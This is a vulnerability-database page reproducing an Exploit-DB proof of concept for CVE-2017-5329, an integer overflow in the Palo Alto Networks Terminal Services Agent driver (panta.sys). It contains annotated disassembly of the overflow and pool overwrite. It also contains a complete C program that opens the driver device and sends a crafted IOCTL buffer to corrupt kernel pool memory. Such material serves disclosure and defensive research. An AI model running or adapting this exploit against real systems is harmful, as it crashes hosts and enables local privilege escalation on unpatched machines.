Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow

🗓️ 26 Jan 2017 00:00:00Reported by Parvez AnwarType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 45 Views

Palo Alto Networks Terminal Services Agent Integer Overflow 7.0.3-1

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow Exploit
27 Jan 201700:00
zdt
Circl		CVE-2017-5329
26 Jan 201700:00
circl
CNVD		Palo Alto Networks Terminal Services Agent Elevation of Privilege Vulnerability
6 Feb 201700:00
cnvd
CVE		CVE-2017-5329
27 Jan 201722:01
cve
Cvelist		CVE-2017-5329
27 Jan 201722:01
cvelist
EUVD		EUVD-2017-14434
7 Oct 202500:30
euvd
exploitpack		Palo Alto Networks Terminal Services Agent 7.0.3-13 - Integer Overflow
26 Jan 201700:00
exploitpack
NVD		CVE-2017-5329
27 Jan 201722:59
nvd
OSV		CVE-2017-5329
27 Jan 201722:59
osv
Palo Alto Networks		Local Privilege Escalation in Terminal Server Agent
26 Jan 201718:30
paloalto
Rows per page
/*

Exploit Title    - Palo Alto Networks Terminal Services Agent Integer Overflow
Date             - 26th January 2017
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - https://www.paloaltonetworks.com/
Tested Version   - 7.0.3-13 
Driver Version   - 6.0.7.0 - panta.sys
Tested on OS     - 32bit Windows 7 SP1 
CVE ID           - CVE-2017-5329
Vendor fix url   - https://securityadvisories.paloaltonetworks.com/ 
                   https://securityadvisories.paloaltonetworks.com/Home/Detail/71
Fixed Version    - 7.0.7 and later 
Fixed driver ver - 6.0.8.0


Disassembly
-----------

.text:9A26F0BD loc_9A26F0BD:                                                         
.text:9A26F0BD                 mov     ecx, DeviceObject                             
.text:9A26F0C3                 mov     dword ptr [ecx+1ACh], 0                       
.text:9A26F0CD                 mov     edx, DeviceObject
.text:9A26F0D3                 mov     eax, [edx+1B8h]                               ; eax points to our inputted buffer
.text:9A26F0D9                 mov     ecx, [eax+14h]                                ; Takes size to allocate from our inputted buffer 0x04924925
.text:9A26F0DC                 imul    ecx, 38h                                      ; 0x38 * 0x04924925 = 0x100000018. Wraps round becoming size to allocate 0x18 (Integer Overflow)
.text:9A26F0DF                 mov     [ebp+NumberOfBytes], ecx                      ; Copy ecx value 0x18 onto stack
.text:9A26F0E2                 push    44415450h                                     ; Tag (PTAD string used)
.text:9A26F0E7                 mov     edx, [ebp+NumberOfBytes]                      ; Copy size 0x18 to edx
.text:9A26F0EA                 push    edx                                           ; NumberOfBytes
.text:9A26F0EB                 push    0                                             ; PoolType
.text:9A26F0ED                 call    ds:ExAllocatePoolWithTag                      ; If returned null (eax) exits with error cleanly else takes crash path 
.text:9A26F0F3                 mov     ecx, DeviceObject
.text:9A26F0F9                 mov     [ecx+1B0h], eax
.text:9A26F0FF                 mov     edx, DeviceObject
.text:9A26F105                 cmp     dword ptr [edx+1B0h], 0                       ; Checks return value. If not null then jumps to our crash path
.text:9A26F10C                 jnz     short loc_9A26F13C                            ; Exits with error cleanly if incorrect size value but not crashable value

.text:9A26F13C
.text:9A26F13C loc_9A26F13C:                                                         
.text:9A26F13C                 mov     ecx, [ebp+NumberOfBytes]
.text:9A26F13F                 push    ecx                                           ; 0x18 our allocated pool memory
.text:9A26F140                 push    0                                             ; int, sets allocated memory to 0x00
.text:9A26F142                 mov     edx, DeviceObject
.text:9A26F148                 mov     eax, [edx+1B0h]
.text:9A26F14E                 push    eax                                           ; Pointer to our allocated buffer
.text:9A26F14F                 call    memset
.text:9A26F154                 add     esp, 0Ch
.text:9A26F157                 mov     [ebp+var_4], 0                                ; Null out ebp-4
.text:9A26F15E                 jmp     short loc_9A26F169

.text:9A26F160 loc_9A26F160:                                                         
.text:9A26F160                 mov     ecx, [ebp+var_4]
.text:9A26F163                 add     ecx, 1                                        ; Increment counter
.text:9A26F166                 mov     [ebp+var_4], ecx                              ; Store counter value

.text:9A26F169 loc_9A26F169:                                                         
.text:9A26F169                 mov     edx, DeviceObject                             
.text:9A26F16F                 mov     eax, [edx+1B8h]                               ; eax points to our inputted buffer
.text:9A26F175                 mov     ecx, [ebp+var_4]                              ; Loop counter number
.text:9A26F178                 cmp     ecx, [eax+14h]                                ; Compares our inputted buffer size 0x04924925. Here our
                                                                                     ; size is not using the wrapped value so loops till BSOD
.text:9A26F17B                 jnb     short loc_9A26F19A
.text:9A26F17D                 mov     edx, [ebp+var_4]                              ; Counter value
.text:9A26F180                 imul    edx, 38h
.text:9A26F183                 mov     eax, DeviceObject
.text:9A26F188                 mov     ecx, [eax+1B0h]                               ; Pointer to allocated pool copied to ecx
.text:9A26F18E                 lea     edx, [ecx+edx+30h]                            ; pointer+size(0x38*edx)+0x30
.text:9A26F192                 push    edx
.text:9A26F193                 call    sub_9A26C000                                  ; Starts overwriting other pool allocations !!!
.text:9A26F198                 jmp     short loc_9A26F160



.text:9A26C000 sub_9A26C000    proc near                                             
.text:9A26C000                                                                      
.text:9A26C000
.text:9A26C000 arg_0           = dword ptr  8
.text:9A26C000
.text:9A26C000                 push    ebp                                           
.text:9A26C001                 mov     ebp, esp
.text:9A26C003                 mov     eax, [ebp+arg_0]                              ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to eax
.text:9A26C006                 mov     ecx, [ebp+arg_0]                              ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to ecx
.text:9A26C009                 mov     [eax+4], ecx                                  ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30+4
.text:9A26C00C                 mov     edx, [ebp+arg_0]                              ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to edx
.text:9A26C00F                 mov     eax, [ebp+arg_0]                              ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to eax
.text:9A26C012                 mov     [edx], eax                                    ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30
.text:9A26C014                 pop     ebp
.text:9A26C015                 retn    4
.text:9A26C015 sub_9A26C000    endp



*/



#include <stdio.h>
#include <windows.h>

#define BUFSIZE 44


int main(int argc, char *argv[]) 
{
    HANDLE         hDevice;
    char           devhandle[MAX_PATH];
    DWORD          dwRetBytes = 0;
    unsigned char  buffer[BUFSIZE];


    memset(buffer, 0x41, BUFSIZE);

    printf("\n[i] Size of total input buffer %d bytes", BUFSIZE);

    *(DWORD*)(buffer + 20) = 0x04924925;

    sprintf(devhandle, "\\\\.\\%s", "panta");

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    
    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n[-] Failed to open device %s\n\n", devhandle);
        return -1;
    }
    else 
    {
        printf("\n[+] Open %s device successful", devhandle);
    }	

    printf("\n[~] Press any key to continue . . .");
    getch();

    DeviceIoControl(hDevice, 0x88002200, buffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL); 

    printf("\n");
    CloseHandle(hDevice);
    return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Jan 2017 00:00Current
7.7High risk
Vulners AI Score7.7
CVSS 24.6
CVSS 3.17.8
EPSS0.00156
palo alto networksterminal servicesinteger overflowvulnerabilitycve-2017-5329windows 7 sp1
45